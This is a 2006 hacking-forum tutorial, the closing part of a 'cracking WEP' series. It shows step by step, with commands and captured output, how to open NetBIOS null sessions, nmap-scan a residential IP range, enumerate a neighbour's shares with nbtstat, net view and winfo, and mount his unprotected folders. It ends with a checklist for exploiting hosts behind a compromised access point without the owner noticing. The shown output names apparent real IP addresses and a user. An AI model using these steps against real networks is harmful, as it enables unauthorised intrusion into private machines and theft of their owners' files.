• cracking wep with windows xp pro
  
• cracking wep with windows xp pro cont
  
• cracking wep with windows xp part 2
  
• cracking wep with windows xp part 2 continued
  
• cracking wep with windows xp part 2 continued 2
  

• 2007 a hacking odyssey part one: reconnaissance
  
• 2007 a hacking odyssey part one: reconnaissance continued
  
• 2007 a hacking odyssey part one: reconnaissance continued 2
  
• 2007 a hacking odyssey part one: reconnaissance continued 3
  
• 2007 a hacking odyssey part one: reconnaissance continued 4
  

• 2007 a hacking odyssey part two:  network scanning and nmap
  
• 2007 a hacking odyssey part two:  network scanning and nmap continued
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 2
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 3
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 4
  

• 2007 a hacking odyssey part two:  network scanning and nmap cont 5
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 6
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 7
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 8
  
• 2007 a hacking odyssey part two:  network scanning and nmap cont 9
  

• computertutorials
  
• computertutorials2
  
• securitytutorials2
  
• computertutorials3
  
• computertutorials4
  
• securitytutorials3
  
• securitytutorials4
  

CRACKING WEP WITH WINDOWS XP PART 2 CONTINUED 2

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.
Code:

H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the “” /U:”” switch at the end of our command.

Try the following:
Code:

H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.


Now try the ‘net view’ command again to see if we can get a list of the shares. This may or may not be successful but more often than not it will fail.(If you are successful read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the oN/ switch or to right click the top of the command prompt window and go to properties. Once here increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.
Code:

nmap -sS -P0 -v 86.132.223.0-255 -p 139,445


The results for open ports came back as:
Code:

Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227



OK, so now we have a whole host of my neighbours to connect to!

Let choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:
Code:

H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00



Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

Code:

H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

-------------------------------------------------------------------------------
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.



Look at all those shares.

Now open up a new command prompt and give the following command:
Code:

H:\>winfo 86.132.223.178 -v

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/


SYSTEM INFORMATION:

- OS version: 5.1

DOMAIN INFORMATION:

- Primary domain (legacy): MSHOME
- Account domain: OFFICE
- Primary domain: MSHOME
- DNS name for primary domain:
- Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

- Type: Unknown
- Remark: Remote IPC

* print$

- Type: Disk drive
- Remark: Printer Drivers

* SharedDocs

- Type: Disk drive
- Remark:

* johns

- Type: Disk drive
- Remark:

* PaperPor.2

- Type: Print queue
- Remark: PaperPort Color Image

* Printer7

- Type: Print queue
- Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

- Type: Disk drive
- Remark:

* Printer4

- Type: Print queue
- Remark: ProgeSOFT PDF Wizard

* PaperPor

- Type: Print queue
- Remark: PaperPort Black & White Image

* BrotherD.2

- Type: Print queue
- Remark: BRN_759F2E

* bramford photos

- Type: Disk drive
- Remark:

* Printer9

- Type: Print queue
- Remark: EPSON PictureMate

* Printer

- Type: Print queue
- Remark: Imprimante Fax Olitec

* BrotherD

- Type: Print queue
- Remark: Brother DCP-340CW USB Printer



As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

"Net use" – means we are going to use a network resource.
The "*"means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM etc. Using the * just tells windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to but the outcome is the same.
Code:

H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.


Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to ‘My Computer’ and you will have a Z drive there already connected and mapped out for you! Click on it and you get to see what is in Johns share.

Let’s try another Share:
Code:

H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.


So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.

There are many things that you can do now - some will work, most will not. It is all about research to see what your options are.



To reiterate:
- Find the IP range in use;
- Find the default gateway, which will usually be the IP of the AP;
- Try to connect to the AP’s admin page by typing the IP into a web browser;
- Ping sweep the IP range to see what hosts are up;
- Port scan each individual host to see what services are running;
- Research the active services – what they are, how they work, etc;
- Research how to exploit a service that looks "interesting";
- Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.



The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled and how to connect to one that has MAC address filtering enabled, and also to give you a few basic tips and a push in the right direction to show you the kind of things you can do when you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP – some with easy to exploit flaws, some with flaws that are harder to exploit and some with no flaws at all – but these services are the key to connecting to ANY computer; if there are no services running, you can’t connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo done on what has to be the worst forum I have ever seen here with Part One and not only try to pass it off as their own but also thank ME for helping THEM write it!

Original Tutorial by nokia for TheTAZZone-TAZForum

Originally posted on September 2nd, 2006 here

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post...we do not sell, publish, transmit, or have the right to give permission for such...TheTAZZone merely retains the right to use, retain, and publish submitted work within it's Network.